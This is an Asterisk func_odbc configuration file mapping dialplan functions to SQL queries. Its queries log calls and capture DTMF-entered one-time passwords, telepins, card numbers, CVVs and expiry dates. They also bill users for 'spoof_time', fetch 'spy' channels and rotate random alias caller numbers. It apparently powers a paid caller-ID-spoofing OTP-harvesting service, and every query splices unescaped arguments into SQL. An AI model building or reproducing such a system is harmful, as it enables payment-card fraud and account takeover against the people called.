
[pushLiveReports]
dsn=asterisk
writesql=INSERT INTO live_calls (phone_number, callerid, livekey, status, user_id) VALUES ('${ARG1}','${ARG2}','${ARG3}',1,'${ARG4}')

[pushLiveReportsOtp]
dsn=asterisk
writesql=INSERT INTO live_calls (phone_number, callerid, livekey, status, call_type, otp_call_status, user_id) VALUES ('${ARG1}','${ARG2}','${ARG3}',1,'otp',2,'${ARG4}')

[updateLiveReports]
dsn=asterisk
writesql=UPDATE live_calls SET status='2' WHERE livekey='${ARG1}'

[updateLiveReportsOtp]
dsn=asterisk
writesql=UPDATE live_calls SET status='${ARG3}', otp_call_status='${ARG2}' WHERE livekey='${ARG1}'

[addtelepinLiveReports]
dsn=asterisk
writesql=UPDATE live_calls SET otp_call_status='6',telepin='${ARG2}' WHERE livekey='${ARG1}'

[addOtpinLiveReports]
dsn=asterisk
writesql=UPDATE live_calls SET otp_call_status='4', otp='${ARG2}' WHERE livekey='${ARG1}'


[otp_enterCardNumber]
dsn=asterisk
writesql=UPDATE live_calls SET otp_call_status='4', card_number='${ARG2}' WHERE livekey='${ARG1}'

[otp_enterCardNumber_security_cvv]
dsn=asterisk
writesql=UPDATE live_calls SET otp_call_status='7', card_cvv='${ARG2}' WHERE livekey='${ARG1}'

[otp_enterCardNumber_expiry]
dsn=asterisk
writesql=UPDATE live_calls SET otp_call_status='6', card_expiry='${ARG2}' WHERE livekey='${ARG1}'

[updateChannel]
dsn=asterisk
writesql=UPDATE phone_number SET channel='${ARG2}' WHERE id='${ARG1}'


[popLiveReports]
dsn=asterisk
writesql=DELETE FROM live_calls WHERE livekey='${ARG1}'


[updateDtmf]
dsn=asterisk
writesql=UPDATE live_calls SET dtmf='${ARG2}' WHERE livekey='${ARG1}'

[pushReports]
dsn=asterisk
writesql=INSERT INTO outgoing_reports (call_start_time, dialed_number, callerid, call_status, duration, unique_id, dtmf, user_id, cost) VALUES ('${ARG1}','${ARG2}','${ARG3}','${ARG4}','${ARG5}','${ARG6}','${ARG7}','${ARG8}','${ARG9}')



[GetUserId]
dsn=asterisk
readsql=SELECT id_cc_card FROM cc_sip_buddies WHERE name='${ARG1}'

[GetUserIdWebPhone]
dsn=asterisk
readsql=SELECT user_id FROM webphone_sips WHERE username='${ARG1}'


[GetDtmf]
dsn=asterisk
readsql=SELECT dtmf FROM live_calls WHERE livekey='${ARG1}'

[GetOtp]
dsn=asterisk
readsql=SELECT otp FROM live_calls WHERE livekey='${ARG1}'


[GetPitch]
dsn=asterisk
readsql=SELECT pitch FROM login WHERE id='1'

[updatePhoneNumberStatus]
dsn=asterisk
writesql=UPDATE phone_number SET dial_status='1' WHERE id='${ARG1}'

[updatePhoneNumberReports]
dsn=asterisk
writesql=UPDATE phone_number SET call_start_time='${ARG2}',call_status='${ARG3}',duration='${ARG4}',unique_id='${ARG5}',dtmf='${ARG6}',dial_status='${ARG7}',call_record_file='${ARG8}' WHERE id='${ARG1}'

[updateDtmfInReports]
dsn=asterisk
writesql=UPDATE phone_number SET dtmf='${ARG1}' WHERE id='${ARG2}'


[updateVoicePasswords]
dsn=asterisk
writesql=UPDATE phone_number SET voice_password1='${ARG2}',voice_password2='${ARG3}',phone_number_alias='${ARG4}' WHERE id='${ARG1}'

[GetRandomNumber]
dsn=asterisk
readsql=SELECT alias_number from phone_number_alias WHERE status='0' ORDER BY RAND() LIMIT 1

[updateRandomNumberStatus]
dsn=asterisk
writesql=UPDATE phone_number_alias SET status='1' WHERE alias_number='${ARG1}'


[GetDataForRandomNumber]
dsn=asterisk
readsql=SELECT phone_number,callerid,voice_password1,voice_password2 FROM phone_number WHERE phone_number_alias='${ARG1}'

[GetSpyChannel]
dsn=asterisk
readsql=SELECT channel FROM phone_number WHERE id='${ARG1}'

[checkChannelReady]
dsn=asterisk
readsql=SELECT channel_ready FROM phone_number WHERE id='${ARG1}'

[disableChannel]
dsn=asterisk
writesql=UPDATE phone_number SET channel_ready='0' WHERE id='${ARG1}'

[Update_Balance]
dsn=asterisk
writesql=UPDATE users SET spoof_time=(spoof_time - ${ARG2}) WHERE id='${ARG1}'

[Check_Balance]
dsn=asterisk
readsql=SELECT spoof_time FROM users WHERE id='${ARG1}'

[Check_Subscription]
dsn=asterisk
readsql=SELECT end_date FROM subscriptions WHERE user_id='${ARG1}' AND service_id='4'




